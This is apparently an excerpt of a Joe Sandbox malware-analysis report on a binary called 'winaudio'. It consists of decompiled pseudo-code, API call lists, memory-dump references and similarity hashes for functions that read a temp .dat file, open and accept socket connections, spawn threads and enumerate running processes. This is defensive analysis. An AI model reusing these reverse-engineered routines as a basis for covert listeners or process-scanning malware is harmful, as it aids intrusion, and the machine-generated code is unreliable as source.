                        • GetFileSize.KERNEL32(00000000,00000000), ref: 002DA473
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 002DA4B5
                        • GetLastError.KERNEL32 ref: 002DA4BF
                        • CloseHandle.KERNEL32(00000000), ref: 002DA4EA
                        Strings
                        • 5B7C84755D8041139A7AEBA6F4E5912F.dat, xrefs: 002DA3FD
                        • C:\Windows\Temp\%s, xrefs: 002DA402
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: File$CloseCreateErrorHandleLastReadSize
                        • String ID: 5B7C84755D8041139A7AEBA6F4E5912F.dat$C:\Windows\Temp\%s
                        • API String ID: 3577853679-3814355176
                        • Opcode ID: 1ab4504866fc33e42121bed4c7662a58f24decb34bccf18b677823441b9f0f97
                        • Instruction ID: a1064bed5466b5200b9e07a1015888e6ebe8e6af35dcfbc18c6ef3b0c44391ee
                        • Opcode Fuzzy Hash: 1ab4504866fc33e42121bed4c7662a58f24decb34bccf18b677823441b9f0f97
                        • Instruction Fuzzy Hash: 5531E571E40218ABDB32DF65DC46FDAB7A8AB05700F400196F948E73C0EAF59E908E91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DB3C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62networkCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 002DB3E5
                        • GetLastError.KERNEL32 ref: 002DB3EF
                        • socket.WS2_32(00000002,00000001,00000000), ref: 002DB410
                        • inet_addr.WS2_32(127.0.0.1), ref: 002DB41D
                        • htons.WS2_32 ref: 002DB439
                        • connect.WS2_32(00000000,00000010,00000010), ref: 002DB475
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLastStartupconnecthtonsinet_addrsocket
                        • String ID: 127.0.0.1
                        • API String ID: 1049944029-3619153832
                        • Opcode ID: de4d675c942823257ef1f6aeafa951c410ee257b16ee456b1c6e6cd07b2567e7
                        • Instruction ID: 735a2945a4eed6c4d363a4c1b64825486d1a245a249a278782e56317a54020bb
                        • Opcode Fuzzy Hash: de4d675c942823257ef1f6aeafa951c410ee257b16ee456b1c6e6cd07b2567e7
                        • Instruction Fuzzy Hash: AD11D6316143009FE711EF74EC4A7AA77DCEB45710F404A1BF899C62E0EB748440CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D4E40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 133threadnetworkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 64%
                        			E002D4E40(void* __ebx, intOrPtr __ecx, struct _SECURITY_ATTRIBUTES* __edx, void* __edi) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				short _v26;
				short _v30;
				char _v40;
				struct _SECURITY_ATTRIBUTES* _v44;
				char _v48;
				intOrPtr _v52;
				void* __esi;
				signed int _t41;
				signed int _t42;
				intOrPtr _t45;
				intOrPtr _t49;
				signed int _t51;
				signed int _t53;
				intOrPtr _t57;
				void* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t73;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t90;
				void* _t92;
				void* _t93;
				signed int _t94;
				void* _t95;
				intOrPtr _t96;

				_t88 = __edx;
				_push(0xffffffff);
				_push(0x39c650);
				_push( *[fs:0x0]);
				_t96 = _t95 - 0x24;
				_t41 =  *0x3e1008; // 0x847b54ee
				_t42 = _t41 ^ _t94;
				_v24 = _t42;
				_push(_t92);
				_push(__edi);
				_push(_t42);
				 *[fs:0x0] =  &_v16;
				_v20 = _t96;
				_t90 = __ecx;
				_t75 =  *((intOrPtr*)(__ecx + 0x38));
				_v52 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) == 0) {
					L10:
					 *[fs:0x0] = _v16;
					_pop(_t93);
					__eflags = _v24 ^ _t94;
					return E002E056D(_v24 ^ _t94, _t88, _t93);
				}
				 *0x3f0830 = 0x7ff7; // executed
				_t45 = E002D1C10(_t75, __ecx); // executed
				 *((intOrPtr*)(__ecx + 0x34)) = _t45;
				if(_t45 == 0xffffffff) {
					goto L10;
				}
				while( *((char*)(_t90 + 0xd)) == 0) {
					_v48 = 0x10;
					_v40 = 0;
					asm("xorps xmm0, xmm0");
					_v30 = 0;
					_v26 = 0;
					asm("movq [ebp-0x22], xmm0");
					_t49 =  *0x39e230( *((intOrPtr*)(_t90 + 0x34)),  &_v40,  &_v48); // executed
					_t73 = _t49;
					if(_t73 != 0xffffffff) {
						_t80 =  *0x3eb4dc; // 0x6556
						_t81 = _t80 + 2;
						_t82 =  >  ? 0 : _t81;
						_t51 =  *0x3eb4f0; // 0x6556
						 *0x3eb4dc =  >  ? 0 : _t81;
						_v8 = 0;
						_t53 =  >  ? 0 : _t51 + 2;
						 *0x3eb4f0 = _t53;
						 *0x3f0830 = _t53 & 0x00000019 | 0x000000e0;
						_t92 = E002E057E(_t88, _t92, _t51 + 2 - 0x1490, 0x20);
						_v44 = 0;
						_t57 =  *0x3ebad8; // 0x6556
						_t96 = _t96 + 4;
						_t58 = _t57 + 2;
						 *0x3f0830 = 0x7ff7;
						 *_t92 = 0x3dce9c;
						_t59 =  >  ? _v44 : _t58;
						 *((char*)(_t92 + 0xc)) = 0;
						 *((char*)(_t92 + 0xd)) = 0;
						 *(_t92 + 4) = 0;
						 *_t92 = 0x3dd4c8;
						 *(_t92 + 0x1c) = 0;
						 *(_t92 + 0x18) = 0;
						_t88 =  *(_t90 + 0x40);
						 *0x3ebad8 =  >  ? _v44 : _t58;
						 *((intOrPtr*)(_t92 + 0x10)) = _t73;
						 *((intOrPtr*)(_t92 + 0x14)) = _t90;
						 *(_t92 + 0x18) =  *(_t90 + 0x3c);
						 *(_t92 + 0x1c) =  *(_t90 + 0x40);
						if( *((char*)(_t92 + 0xd)) == 0) {
							if( *(_t92 + 4) == 0) {
								_t31 = _t92 + 8; // 0x8
								 *(_t92 + 4) = CreateThread(0, 0, E002D2270, _t92, 4, _t31);
							}
							 *0x3f0830 = 0x7ff7;
							 *((char*)(_t92 + 0xc)) = ResumeThread( *(_t92 + 4)) & 0xffffff00 | _t67 != 0xffffffff;
						}
						_t60 =  *0x3ebafc; // 0x6556
						_t62 =  >  ? 0 : _t60 + 2;
						 *0x3ebafc = _t62;
						 *0x3f0830 = _t62 & 0x00000019 | 0x000000e0;
						E002D2550(_t90, _t88, _t60 + 2 - 0x1490, _t92);
						_v8 = 0xffffffff;
						E002D2600();
					}
				}
				goto L10;
			}

































                        0x002d4e40
                        0x002d4e43
                        0x002d4e45
                        0x002d4e50
                        0x002d4e51
                        0x002d4e54
                        0x002d4e59
                        0x002d4e5b
                        0x002d4e5f
                        0x002d4e60
                        0x002d4e61
                        0x002d4e65
                        0x002d4e6b
                        0x002d4e6e
                        0x002d4e70
                        0x002d4e73
                        0x002d4e78
                        0x002d5029
                        0x002d502c
                        0x002d5035
                        0x002d503a
                        0x002d5044
                        0x002d5044
                        0x002d4e7e
                        0x002d4e88
                        0x002d4e8d
                        0x002d4e93
                        0x00000000
                        0x00000000
                        0x002d4ea0
                        0x002d4eac
                        0x002d4eb3
                        0x002d4eb7
                        0x002d4eba
                        0x002d4ebd
                        0x002d4ec8
                        0x002d4ed1
                        0x002d4ed7
                        0x002d4edc
                        0x002d4ede
                        0x002d4ee6
                        0x002d4ef1
                        0x002d4ef4
                        0x002d4efc
                        0x002d4f09
                        0x002d4f0c
                        0x002d4f0f
                        0x002d4f1c
                        0x002d4f26
                        0x002d4f28
                        0x002d4f2f
                        0x002d4f34
                        0x002d4f37
                        0x002d4f3a
                        0x002d4f49
                        0x002d4f4f
                        0x002d4f53
                        0x002d4f57
                        0x002d4f5b
                        0x002d4f62
                        0x002d4f68
                        0x002d4f6f
                        0x002d4f7a
                        0x002d4f80
                        0x002d4f85
                        0x002d4f88
                        0x002d4f8b
                        0x002d4f8e
                        0x002d4f91
                        0x002d4f97
                        0x002d4f99
                        0x002d4faf
                        0x002d4faf
                        0x002d4fb5
                        0x002d4fcb
                        0x002d4fcb
                        0x002d4fce
                        0x002d4fde
                        0x002d4fe3
                        0x002d4ff0
                        0x002d4ff5
                        0x002d4ffc
                        0x002d5003
                        0x002d5003
                        0x002d4edc
                        0x00000000

                        APIs
                          • Part of subcall function 002D1C10: socket.WS2_32(00000002,00000001,00000000), ref: 002D1C2A
                          • Part of subcall function 002D1C10: GetLastError.KERNEL32 ref: 002D1C37
                        • accept.WS2_32(847B54EE,?,00000010), ref: 002D4ED1
                        • new.LIBCMT ref: 002D4F21
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,00000000,00000004,00000008), ref: 002D4FA9
                        • ResumeThread.KERNEL32(?), ref: 002D4FBF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResumeacceptsocket
                        • String ID: @!-$`;-
                        • API String ID: 2084543587-841799461
                        • Opcode ID: aab5fa79198665710c402b374ece9eb9386b01ea444bf3143c3806df6150b7da
                        • Instruction ID: c15511503cd2a8d1464254750d25473534268616ef2293c9d87483d0dadad714
                        • Opcode Fuzzy Hash: aab5fa79198665710c402b374ece9eb9386b01ea444bf3143c3806df6150b7da
                        • Instruction Fuzzy Hash: 7A51ACB19107459FD725CF65D8817AABBF8FB48310F108A2EE05A97790D774A894CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D6D60 Relevance: 9.2, APIs: 6, Instructions: 222processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E002D6D60(void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __eflags) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v568;
				void* _v576;
				int _v580;
				int _v584;
				signed int _v588;
				char _v592;
				intOrPtr _v596;
				char _v604;
				char _v612;
				void* __esi;
				signed int _t59;
				signed int _t60;
				void* _t66;
				int _t68;
				int _t70;
				intOrPtr* _t71;
				intOrPtr* _t78;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				long _t107;
				intOrPtr _t108;
				signed int _t110;
				intOrPtr _t111;
				char _t113;
				intOrPtr* _t120;
				intOrPtr* _t127;
				intOrPtr* _t128;
				void* _t130;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				signed int _t138;
				void* _t143;

				_t143 = __eflags;
				_t127 = __edx;
				_push(0xffffffff);
				_push(0x39c7ab);
				_push( *[fs:0x0]);
				_t59 =  *0x3e1008; // 0x847b54ee
				_t60 = _t59 ^ _t138;
				_v20 = _t60;
				_push(__ebx);
				_push(__edi);
				_push(_t60);
				 *[fs:0x0] =  &_v16;
				_v596 = __ecx;
				E0037E1A0(__edi,  &_v576, 0, 0x22c);
				_v584 = 0;
				_v580 = 0;
				_v584 = E002D8480(_t143);
				_v8 = 0;
				_t107 = GetCurrentProcessId(); // executed
				_t66 = CreateToolhelp32Snapshot(2, 0); // executed
				_t130 = _t66;
				if(_t130 != 0) {
					_v576 = 0x22c;
					_t68 = Process32First(_t130,  &_v576);
					__eflags = _t68;
					if(_t68 != 0) {
						do {
							_t113 = _v568;
							__eflags = _t113 - 0x64;
							if(_t113 < 0x64) {
								goto L14;
							}
							__eflags = _t113 - _t107;
							if(_t113 == _t107) {
								goto L14;
							}
							_t137 = _v584;
							_t127 = _t137;
							_t71 =  *((intOrPtr*)(_t137 + 4));
							__eflags =  *((char*)(_t71 + 0xd));
							if( *((char*)(_t71 + 0xd)) != 0) {
								L13:
								E002D8530( &_v584,  &_v592, _t113,  &_v568, _v588);
								goto L14;
							} else {
								goto L7;
							}
							do {
								L7:
								__eflags =  *((intOrPtr*)(_t71 + 0x10)) - _t113;
								if( *((intOrPtr*)(_t71 + 0x10)) >= _t113) {
									_t127 = _t71;
									_t71 =  *_t71;
								} else {
									_t71 =  *((intOrPtr*)(_t71 + 8));
								}
								__eflags =  *((char*)(_t71 + 0xd));
							} while ( *((char*)(_t71 + 0xd)) == 0);
							__eflags = _t127 - _t137;
							if(_t127 == _t137) {
								goto L13;
							}
							__eflags = _t113 -  *((intOrPtr*)(_t127 + 0x10));
							if(_t113 >=  *((intOrPtr*)(_t127 + 0x10))) {
								goto L14;
							}
							goto L13;
							L14:
							_t70 = Process32Next(_t130,  &_v576);
							__eflags = _t70;
						} while (_t70 != 0);
						CloseHandle(_t130);
						_t108 = _v596;
						E002D6B20(_t108,  &_v584);
						_t78 = _v584;
						_t134 =  *_t78;
						__eflags = _t134 - _t78;
						if(_t134 == _t78) {
							L45:
							goto L46;
						}
						_t110 = _t108 + 0x10;
						__eflags = _t110;
						_v588 = _t110;
						do {
							_t85 =  *_t110;
							_t132 = _t134 + 0x10;
							 *0x3f0830 = 0x7ff7;
							_t128 = _t85;
							_t120 =  *((intOrPtr*)(_t85 + 4));
							__eflags =  *((char*)(_t120 + 0xd));
							if( *((char*)(_t120 + 0xd)) != 0) {
								L24:
								__eflags = _t128 - _t85;
								if(_t128 == _t85) {
									L26:
									_t127 = _t85;
									L27:
									__eflags = _t127 -  *_t110;
									if(_t127 ==  *_t110) {
										_t89 = E002D65C0(_t110, _t132,  *_t132); // executed
										__eflags = _t89 - 1;
										if(_t89 != 1) {
											__eflags = _t89;
											if(_t89 != 0) {
												_t90 =  *0x3ebb70; // 0x6556
												_t91 = _t90 + 2;
												__eflags = _t91 - 0x1490;
												_t92 =  >  ? 0 : _t91;
												 *0x3ebb70 = _t92;
												_t94 = _t92 & 0x00000019 | 0x000000e0;
												__eflags = _t94;
												 *0x3f0830 = _t94;
											} else {
												E002D8530(_t110,  &_v612, _t120, _t132, _v588);
											}
										} else {
											_t123 = _v596;
											_t97 = E002D69E0(_v596, _t127, _t132,  *_t132);
											__eflags = _t97;
											if(_t97 > 0) {
												E002D8530(_t110,  &_v604, _t123, _t132, _v588);
											}
										}
									}
									__eflags =  *((char*)(_t134 + 0xd));
									if( *((char*)(_t134 + 0xd)) == 0) {
										_t86 =  *((intOrPtr*)(_t134 + 8));
										__eflags =  *((char*)(_t86 + 0xd));
										if( *((char*)(_t86 + 0xd)) != 0) {
											_t87 =  *((intOrPtr*)(_t134 + 4));
											__eflags =  *((char*)(_t87 + 0xd));
											if( *((char*)(_t87 + 0xd)) != 0) {
												L43:
												_t134 = _t87;
												goto L44;
											} else {
												goto L41;
											}
											while(1) {
												L41:
												__eflags = _t134 -  *((intOrPtr*)(_t87 + 8));
												if(_t134 !=  *((intOrPtr*)(_t87 + 8))) {
													goto L43;
												}
												_t134 = _t87;
												_t87 =  *((intOrPtr*)(_t87 + 4));
												__eflags =  *((char*)(_t87 + 0xd));
												if( *((char*)(_t87 + 0xd)) == 0) {
													continue;
												}
												goto L43;
											}
											goto L43;
										}
										_t134 = _t86;
										_t88 =  *_t134;
										__eflags =  *((char*)(_t88 + 0xd));
										if( *((char*)(_t88 + 0xd)) != 0) {
											goto L44;
										}
										do {
											_t134 = _t88;
											_t88 =  *_t134;
											__eflags =  *((char*)(_t88 + 0xd));
										} while ( *((char*)(_t88 + 0xd)) == 0);
									}
									goto L44;
								}
								_t120 =  *_t132;
								__eflags = _t120 -  *((intOrPtr*)(_t128 + 0x10));
								if(_t120 >=  *((intOrPtr*)(_t128 + 0x10))) {
									goto L27;
								}
								goto L26;
							}
							_t111 =  *_t132;
							do {
								__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t111;
								if( *((intOrPtr*)(_t120 + 0x10)) >= _t111) {
									_t128 = _t120;
									_t120 =  *_t120;
								} else {
									_t120 =  *((intOrPtr*)(_t120 + 8));
								}
								__eflags =  *((char*)(_t120 + 0xd));
							} while ( *((char*)(_t120 + 0xd)) == 0);
							_t110 = _v588;
							goto L24;
							L44:
							__eflags = _t134 - _v584;
						} while (_t134 != _v584);
						goto L45;
					} else {
						_t100 =  *0x3ebb40; // 0x6556
						_t101 = _t100 + 2;
						__eflags = _t101 - 0x1490;
						_t102 =  >  ? 0 : _t101;
						 *0x3ebb40 = _t102;
						 *0x3f0830 = _t102 & 0x00000019 | 0x000000e0;
						CloseHandle(_t130);
						goto L46;
					}
				} else {
					L46:
					E002D7D80( &_v584,  &_v588,  *_v584, _v584);
					L002E05B1(_v584);
					 *[fs:0x0] = _v16;
					_pop(_t136);
					return E002E056D(_v20 ^ _t138, _t127, _t136);
				}
			}



















































                        0x002d6d60
                        0x002d6d60
                        0x002d6d63
                        0x002d6d65
                        0x002d6d70
                        0x002d6d77
                        0x002d6d7c
                        0x002d6d7e
                        0x002d6d81
                        0x002d6d83
                        0x002d6d84
                        0x002d6d88
                        0x002d6d8e
                        0x002d6da2
                        0x002d6daa
                        0x002d6db4
                        0x002d6dc3
                        0x002d6dc9
                        0x002d6dda
                        0x002d6ddc
                        0x002d6de2
                        0x002d6de6
                        0x002d6df6
                        0x002d6e02
                        0x002d6e08
                        0x002d6e0a
                        0x002d6e41
                        0x002d6e41
                        0x002d6e47
                        0x002d6e4a
                        0x00000000
                        0x00000000
                        0x002d6e4c
                        0x002d6e4e
                        0x00000000
                        0x00000000
                        0x002d6e50
                        0x002d6e56
                        0x002d6e58
                        0x002d6e5b
                        0x002d6e5f
                        0x002d6e7e
                        0x002d6e99
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d6e61
                        0x002d6e61
                        0x002d6e61
                        0x002d6e64
                        0x002d6e6b
                        0x002d6e6d
                        0x002d6e66
                        0x002d6e66
                        0x002d6e66
                        0x002d6e6f
                        0x002d6e6f
                        0x002d6e75
                        0x002d6e77
                        0x00000000
                        0x00000000
                        0x002d6e79
                        0x002d6e7c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d6e9e
                        0x002d6ea6
                        0x002d6eac
                        0x002d6eac
                        0x002d6eb1
                        0x002d6eb7
                        0x002d6ec6
                        0x002d6ecb
                        0x002d6ed1
                        0x002d6ed3
                        0x002d6ed5
                        0x002d7003
                        0x00000000
                        0x002d7003
                        0x002d6edb
                        0x002d6edb
                        0x002d6ede
                        0x002d6ef0
                        0x002d6ef0
                        0x002d6ef2
                        0x002d6ef5
                        0x002d6eff
                        0x002d6f01
                        0x002d6f04
                        0x002d6f08
                        0x002d6f2a
                        0x002d6f2a
                        0x002d6f2c
                        0x002d6f35
                        0x002d6f35
                        0x002d6f37
                        0x002d6f37
                        0x002d6f39
                        0x002d6f3d
                        0x002d6f42
                        0x002d6f45
                        0x002d6f70
                        0x002d6f72
                        0x002d6f8c
                        0x002d6f93
                        0x002d6f96
                        0x002d6f9b
                        0x002d6f9e
                        0x002d6fa6
                        0x002d6fa6
                        0x002d6fab
                        0x002d6f74
                        0x002d6f85
                        0x002d6f85
                        0x002d6f47
                        0x002d6f49
                        0x002d6f4f
                        0x002d6f54
                        0x002d6f56
                        0x002d6f69
                        0x002d6f69
                        0x002d6f56
                        0x002d6f45
                        0x002d6fb0
                        0x002d6fb4
                        0x002d6fb6
                        0x002d6fb9
                        0x002d6fbd
                        0x002d6fdc
                        0x002d6fdf
                        0x002d6fe3
                        0x002d6ff5
                        0x002d6ff5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d6fe5
                        0x002d6fe5
                        0x002d6fe5
                        0x002d6fe8
                        0x00000000
                        0x00000000
                        0x002d6fea
                        0x002d6fec
                        0x002d6fef
                        0x002d6ff3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d6ff3
                        0x00000000
                        0x002d6fe5
                        0x002d6fbf
                        0x002d6fc1
                        0x002d6fc3
                        0x002d6fc7
                        0x00000000
                        0x00000000
                        0x002d6fd0
                        0x002d6fd0
                        0x002d6fd2
                        0x002d6fd4
                        0x002d6fd4
                        0x002d6fda
                        0x00000000
                        0x002d6fb4
                        0x002d6f2e
                        0x002d6f30
                        0x002d6f33
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d6f33
                        0x002d6f0a
                        0x002d6f10
                        0x002d6f10
                        0x002d6f13
                        0x002d6f1a
                        0x002d6f1c
                        0x002d6f15
                        0x002d6f15
                        0x002d6f15
                        0x002d6f1e
                        0x002d6f1e
                        0x002d6f24
                        0x00000000
                        0x002d6ff7
                        0x002d6ff7
                        0x002d6ff7
                        0x00000000
                        0x002d6e0c
                        0x002d6e0c
                        0x002d6e13
                        0x002d6e16
                        0x002d6e1c
                        0x002d6e1f
                        0x002d6e2c
                        0x002d6e31
                        0x00000000
                        0x002d6e37
                        0x002d6de8
                        0x002d7008
                        0x002d701e
                        0x002d7029
                        0x002d7036
                        0x002d703f
                        0x002d704e
                        0x002d704e

                        APIs
                          • Part of subcall function 002D8480: new.LIBCMT ref: 002D8482
                        • GetCurrentProcessId.KERNEL32 ref: 002D6DD0
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002D6DDC
                        • Process32First.KERNEL32(00000000,?), ref: 002D6E02
                        • CloseHandle.KERNEL32(00000000), ref: 002D6E31
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: CloseCreateCurrentFirstHandleProcessProcess32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 4004078892-0
                        • Opcode ID: 5169df47a4328be528fba59129997e06e7013b560c4f73b4c882771cfdc522cc
                        • Instruction ID: cd0872818932508400766138a1ca71002ee8e7ece15b18bd4b00e9d07c5bfbeb
                        • Opcode Fuzzy Hash: 5169df47a4328be528fba59129997e06e7013b560c4f73b4c882771cfdc522cc
                        • Instruction Fuzzy Hash: DB91BD70A2025A9FDB25DF24DC8CBA9B7F9FB04304F5481AAE40A97791DB74AD94CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D1D10 Relevance: 9.1, APIs: 6, Instructions: 76networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WS2_32(00000002,00000001,00000000), ref: 002D1D2D
                        • inet_addr.WS2_32 ref: 002D1D4B
                        • htons.WS2_32 ref: 002D1D55
                        • connect.WS2_32(00000000,?,00000010), ref: 002D1D8A
                        • GetLastError.KERNEL32 ref: 002D1D95
                        • closesocket.WS2_32(00000000), ref: 002D1D9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLastclosesocketconnecthtonsinet_addrsocket
                        • String ID:
                        • API String ID: 3670979538-0
                        • Opcode ID: 9d1af1dedf2ec8cf18f550b9c0a2d6209b3423d687c5ecf479d8b59ff441cf72
                        • Instruction ID: 7dae934429170759f4b7b427ff54a8c8e342e36ee5f9d4cf93691de3013f6465
                        • Opcode Fuzzy Hash: 9d1af1dedf2ec8cf18f550b9c0a2d6209b3423d687c5ecf479d8b59ff441cf72
                        • Instruction Fuzzy Hash: 12210A32A1010497C711DB79EC867AFB7ACEF44320F100B2BF455D72E1D77589408B95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00381153 Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E00381153(void* __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _v5;
				long _v12;
				void* _t14;
				long _t15;
				void* _t27;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0) {
					_push(_t27);
					_t31 = E0038110A(__ecx, __edx, __eflags, _a4, _a12);
					__eflags = _t31;
					if(_t31 == 0) {
						L5:
						_t28 = _t27 | 0xffffffff;
						__eflags = _t28;
						L6:
						E0038107C(_t31);
						return _t28;
					}
					_v12 = _v12 & 0x00000000;
					_t14 = CreateThread(0, _a8, E00380FFD, _t31, 4,  &_v12); // executed
					_t27 = _t14;
					__eflags = _t27;
					if(_t27 != 0) {
						 *(_t31 + 8) = _t27;
						_t15 = ResumeThread(_t27); // executed
						__eflags = _t15 - 0xffffffff;
						if(_t15 == 0xffffffff) {
							goto L4;
						}
						_t31 = 0;
						goto L6;
					}
					L4:
					E00380E68(GetLastError());
					goto L5;
				}
				 *((intOrPtr*)(E00380E9E())) = 0x16;
				return E0037F971() | 0xffffffff;
			}










                        0x00381158
                        0x00381159
                        0x0038115e
                        0x00381176
                        0x00381182
                        0x00381186
                        0x00381188
                        0x003811b8
                        0x003811b8
                        0x003811b8
                        0x003811bb
                        0x003811bf
                        0x00000000
                        0x003811c7
                        0x0038118a
                        0x0038119f
                        0x003811a5
                        0x003811a7
                        0x003811a9
                        0x003811cd
                        0x003811d0
                        0x003811d6
                        0x003811d9
                        0x00000000
                        0x00000000
                        0x003811db
                        0x00000000
                        0x003811db
                        0x003811ab
                        0x003811b2
                        0x00000000
                        0x003811b7
                        0x00381165
                        0x00000000

                        APIs
                        • CreateThread.KERNEL32(00000000,?,Function_000D0FFD,00000000,00000004,00000000), ref: 0038119F
                        • GetLastError.KERNEL32(?,?,?,?,002D6ADD,Function_00025E20), ref: 003811AB
                        • __dosmaperr.LIBCMT ref: 003811B2
                        • ResumeThread.KERNEL32(00000000,?,?,?,?,002D6ADD,Function_00025E20), ref: 003811D0
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
